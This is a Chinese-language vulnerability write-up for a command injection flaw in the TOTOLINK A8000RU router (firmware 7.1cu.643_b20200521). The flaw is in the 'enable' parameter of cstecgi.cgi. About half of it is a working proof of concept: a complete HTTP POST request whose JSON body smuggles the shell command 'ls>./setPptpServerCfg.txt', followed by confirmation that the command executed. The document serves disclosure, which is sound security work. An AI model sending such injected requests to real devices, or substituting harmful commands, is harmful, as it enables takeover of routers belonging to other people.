# A8000RU 命令注入漏洞总结 ## 漏洞概述 TOTOLINK A8000RU 路由器存在命令注入漏洞。在 `cstecgi.cgi` 中,攻击者可以通过构造恶意请求,利用 `enable` 参数执行任意操作系统命令。 ## 影响范围 - **厂商**: TOTOLINK - **产品**: A8000RU - **版本**: 7.1cu.643_b20200521 - **漏洞类型**: 命令注入 (Command Injection) ## 修复方案 目前页面未提供具体的修复方案或补丁信息。建议联系厂商获取更新。 ## 概念验证 (PoC) ### HTTP 请求示例 ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 76 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=2172465792.2 Connection: keep-alive {"topicUrl":"setPptpServerCfg","enable":"ls>./setPptpServerCfg.txt"} ``` ### 利用结果 执行上述请求后,路由器成功创建了 `setPptpServerCfg.txt` 文件,其内容为目标文件夹下的文件名列表,证实命令 `ls>./setPptpServerCfg.txt` 已成功执行。